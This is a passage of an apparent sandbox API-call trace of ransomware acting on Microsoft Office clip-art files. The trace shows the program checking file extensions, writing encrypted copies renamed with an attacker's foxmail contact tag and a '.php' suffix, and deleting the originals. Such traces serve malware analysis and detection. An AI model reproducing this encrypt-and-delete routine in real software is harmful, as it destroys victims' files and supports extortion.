(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.358] lstrlenW (lpString=".1cd") returned 4 [0053.358] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.358] lstrlenW (lpString=".jpg") returned 4 [0053.358] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.359] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=4955) returned 1 [0053.359] CloseHandle (hObject=0x1b0) returned 1 [0053.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 0x20 [0053.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0053.359] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.359] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0053.359] GetLastError () returned 0x0 [0053.359] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x135b, lpOverlapped=0x0) returned 1 [0053.373] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1360, lpOverlapped=0x0) returned 1 [0053.374] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.374] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.374] SetEndOfFile (hFile=0x1a4) returned 1 [0053.374] CloseHandle (hObject=0x1a4) returned 1 [0053.374] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.374] SetEndOfFile (hFile=0x1b0) returned 1 [0053.375] CloseHandle (hObject=0x1b0) returned 1 [0053.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString=".doc") returned 4 [0053.376] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString=".docx") returned 5 [0053.376] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.376] lstrlenW (lpString=".pdf") returned 4 [0053.376] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".xls") returned 4 [0053.376] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".xlsx") returned 5 [0053.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.376] lstrlenW (lpString=".ppt") returned 4 [0053.376] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString=".zip") returned 4 [0053.376] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".rar") returned 4 [0053.376] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".bz2") returned 4 [0053.376] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString=".7z") returned 3 [0053.376] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString=".dbf") returned 4 [0053.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString=".1cd") returned 4 [0053.376] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.376] lstrlenW (lpString=".jpg") returned 4 [0053.376] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.377] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=7583) returned 1 [0053.377] CloseHandle (hObject=0x1b0) returned 1 [0053.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 0x20 [0053.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0053.377] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.377] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0053.378] GetLastError () returned 0x0 [0053.378] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x1d9f, lpOverlapped=0x0) returned 1 [0053.386] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1da0, lpOverlapped=0x0) returned 1 [0053.388] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.388] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.388] SetEndOfFile (hFile=0x1a4) returned 1 [0053.396] CloseHandle (hObject=0x1a4) returned 1 [0053.416] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.416] SetEndOfFile (hFile=0x1b0) returned 1 [0053.417] CloseHandle (hObject=0x1b0) returned 1 [0053.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.418] lstrlenW (lpString=".doc") returned 4 [0053.418] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString=".docx") returned 5 [0053.418] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.418] lstrlenW (lpString=".pdf") returned 4 [0053.418] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".xls") returned 4 [0053.418] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".xlsx") returned 5 [0053.418] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.418] lstrlenW (lpString=".ppt") returned 4 [0053.418] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.418] lstrlenW (lpString=".zip") returned 4 [0053.418] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".rar") returned 4 [0053.418] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.418] lstrlenW (lpString=".bz2") returned 4 [0053.418] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString=".7z") returned 3 [0053.418] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.418] lstrlenW (lpString=".dbf") returned 4 [0053.418] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.418] lstrlenW (lpString=".1cd") returned 4 [0053.418] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.419] lstrlenW (lpString=".jpg") returned 4 [0053.419] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.419] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=9248) returned 1 [0053.419] CloseHandle (hObject=0x1b0) returned 1 [0053.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 0x20 [0053.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0053.420] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.420] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0053.420] GetLastError () returned 0x0 [0053.420] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2420, lpOverlapped=0x0) returned 1 [0053.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2430, lpOverlapped=0x0) returned 1 [0053.427] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.427] WriteFile (in: hFile=0x1a4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.428] SetEndOfFile (hFile=0x1a4) returned 1 [0053.428] CloseHandle (hObject=0x1a4) returned 1 [0053.428] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.428] SetEndOfFile (hFile=0x1b0) returned 1 [0053.429] CloseHandle (hObject=0x1b0) returned 1 [0053.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.429] lstrlenW (lpString=".doc") returned 4 [0053.429] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.429] lstrlenW (lpString=".docx") returned 5 [0053.429] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.429] lstrlenW (lpString=".pdf") returned 4 [0053.429] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.429] lstrlenW (lpString=".xls") returned 4 [0053.430] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".xlsx") returned 5 [0053.430] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.430] lstrlenW (lpString=".ppt") returned 4 [0053.430] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".zip") returned 4 [0053.430] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".rar") returned 4 [0053.430] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.430] lstrlenW (lpString=".bz2") returned 4 [0053.430] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString=".7z") returned 3 [0053.430] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".dbf") returned 4 [0053.430] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".1cd") returned 4 [0053.430] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.430] lstrlenW (lpString=".jpg") returned 4 [0053.430] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.721] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=4390) returned 1 [0053.721] CloseHandle (hObject=0x218) returned 1 [0053.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 0x20 [0053.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.721] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.721] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.721] GetLastError () returned 0x0 [0053.721] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x1126, lpOverlapped=0x0) returned 1 [0054.430] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x1130, lpOverlapped=0x0) returned 1 [0054.431] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.431] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.431] SetEndOfFile (hFile=0x1a8) returned 1 [0055.030] CloseHandle (hObject=0x1a8) returned 1 [0055.031] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.031] SetEndOfFile (hFile=0x218) returned 1 [0055.031] CloseHandle (hObject=0x218) returned 1 [0055.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0055.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.743] lstrlenW (lpString=".doc") returned 4 [0055.743] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0055.743] lstrlenW (lpString=".docx") returned 5 [0055.743] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0055.743] lstrlenW (lpString=".pdf") returned 4 [0055.743] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0055.743] lstrlenW (lpString=".xls") returned 4 [0055.743] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0055.743] lstrlenW (lpString=".xlsx") returned 5 [0055.744] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0055.744] lstrlenW (lpString=".ppt") returned 4 [0055.744] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0055.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.744] lstrlenW (lpString=".zip") returned 4 [0055.744] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0055.744] lstrlenW (lpString=".rar") returned 4 [0055.744] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0055.744] lstrlenW (lpString=".bz2") returned 4 [0055.744] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0055.744] lstrlenW (lpString=".7z") returned 3 [0055.744] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0055.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.744] lstrlenW (lpString=".dbf") returned 4 [0055.744] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0055.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.744] lstrlenW (lpString=".1cd") returned 4 [0055.744] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0055.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0055.744] lstrlenW (lpString=".jpg") returned 4 [0055.744] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.457] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.458] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.458] GetLastError () returned 0x0 [0056.458] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x2a50, lpOverlapped=0x0) returned 1 [0056.462] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x2a60, lpOverlapped=0x0) returned 1 [0056.463] ReadFile (in: hFile=0x218, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.463] WriteFile (in: hFile=0x1bc, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.463] SetEndOfFile (hFile=0x1bc) returned 1 [0056.463] CloseHandle (hObject=0x1bc) returned 1 [0056.464] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.464] SetEndOfFile (hFile=0x218) returned 1 [0056.464] CloseHandle (hObject=0x218) returned 1 [0056.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.465] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0056.465] lstrlenW 